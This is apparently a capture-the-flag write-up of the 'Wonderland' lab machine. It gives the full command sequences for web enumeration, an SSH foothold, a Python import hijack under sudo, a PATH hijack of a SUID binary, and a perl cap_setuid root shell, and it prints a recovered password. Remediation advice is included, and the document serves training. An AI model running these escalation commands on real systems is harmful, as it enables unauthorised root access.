Case file

Rabbit-hole web enum, Python import hijack, and perl capabilities

Intermediate Linux engagement: themed path enumeration exposed SSH credentials; sudo Python imported attacker-writable random.py; SUID teaParty PATH-hijacked date; perl with cap_setuid completed root.

Intermediate30 minLinux · Web · Sudo · Capabilities
  • Directory recursion under /r led to an HTML comment with alice’s password. Three privilege boundaries fell to a sudo Python import, a SUID relative system() call, and file capabilities on perl.

  • nmap and recursive dirsearch under /r recovered alice’s password from an HTML comment at /r/a/b/b/i/t/.

  • sudo as rabbit imported cwd random.py. SUID teaParty resolved date from PATH; a fake date binary spawned hatter.

  • getcap listed perl with cap_setuid+ep. POSIX::setuid(0) followed by exec bash completed the engagement.

01

Engagement summary

Directory recursion under /r led to an HTML comment with alice’s password. Three privilege boundaries fell to a sudo Python import, a SUID relative system() call, and file capabilities on perl.

Against WONDERLAND (10.10.159.138), HTTP presented a Golang site inviting operators to “follow the white rabbit.” Nested directory brute force under /r/a/b/b/i/t/ exposed an HTML comment with alice’s SSH password. The user artifact lived under /root while root’s artifact sat in alice’s home — inverted placement that did not change the privilege model. sudo -l allowed rabbit to run a Python script that imported random from cwd; planting random.py yielded a rabbit shell. SUID teaParty invoked date without a full path; PATH hijack landed as hatter. getcap showed perl with cap_setuid+ep, which setuid(0) and exec’d bash as root.

Business impact

Credentials in client-side comments are still credentials. Sudo that runs interpreters against attacker-writable import paths, SUID helpers that shell out to PATH-resolved binaries, and setuid capabilities on scripting languages are each a direct path to root. Remediate by removing secrets from static assets, locking sudo Python to trusted modules, rewriting SUID helpers with absolute paths, and stripping unnecessary capabilities.

02

Path enumeration and SSH foothold

nmap and recursive dirsearch under /r recovered alice’s password from an HTML comment at /r/a/b/b/i/t/.

OPERATOR · NMAP

savvy@lab:~$ nmap 10.10.159.138 -sV -sC

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu

80/tcp open http Golang net/http server

OPERATOR · DIRSEARCH

savvy@lab:~$ dirsearch -u http://10.10.159.138

/img /r

savvy@lab:~$ dirsearch -u http://10.10.159.138/r/a/b

# theme path → /r/a/b/b/i/t/ ; view-source holds alice credentials

savvy@lab:~$ ssh alice@10.10.159.138

savvy@lab:~$

03

Python import and SUID PATH pivots

sudo as rabbit imported cwd random.py. SUID teaParty resolved date from PATH; a fake date binary spawned hatter.

OPERATOR · PYTHON HIJACK

savvy@lab:~$ sudo -l

(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

savvy@lab:~$ printf 'import os\nos.system("/bin/bash")\n' > /home/alice/random.py

savvy@lab:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

savvy@lab:/home/alice$

OPERATOR · TEAPARTY

savvy@lab:~$ ls -la /home/rabbit/teaParty

-rwsr-sr-x ... teaParty

savvy@lab:~$ ltrace ./teaParty

system("/bin/echo -n 'Probably by ' && date --date='next hour' -R")

savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /home/rabbit/date && chmod +x /home/rabbit/date

savvy@lab:~$ export PATH=/home/rabbit:$PATH && ./teaParty

savvy@lab:/home/rabbit$

savvy@lab:~$ cat /home/hatter/password.txt

WhyIsARavenLikeAWritingDesk?

04

perl cap_setuid to root

getcap listed perl with cap_setuid+ep. POSIX::setuid(0) followed by exec bash completed the engagement.

OPERATOR · CAPABILITIES

savvy@lab:~$ getcap -r / 2>/dev/null

/usr/bin/perl = cap_setuid+ep

savvy@lab:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

root@lab:~# id

uid=0(root) gid=1003(hatter) groups=1003(hatter)

Remediation

Keep secrets out of HTML. Prefer absolute imports and PYTHONSAFEPATH for sudo’d scripts. Compile SUID helpers with absolute binary paths. Audit getcap regularly and remove cap_setuid from interpreters.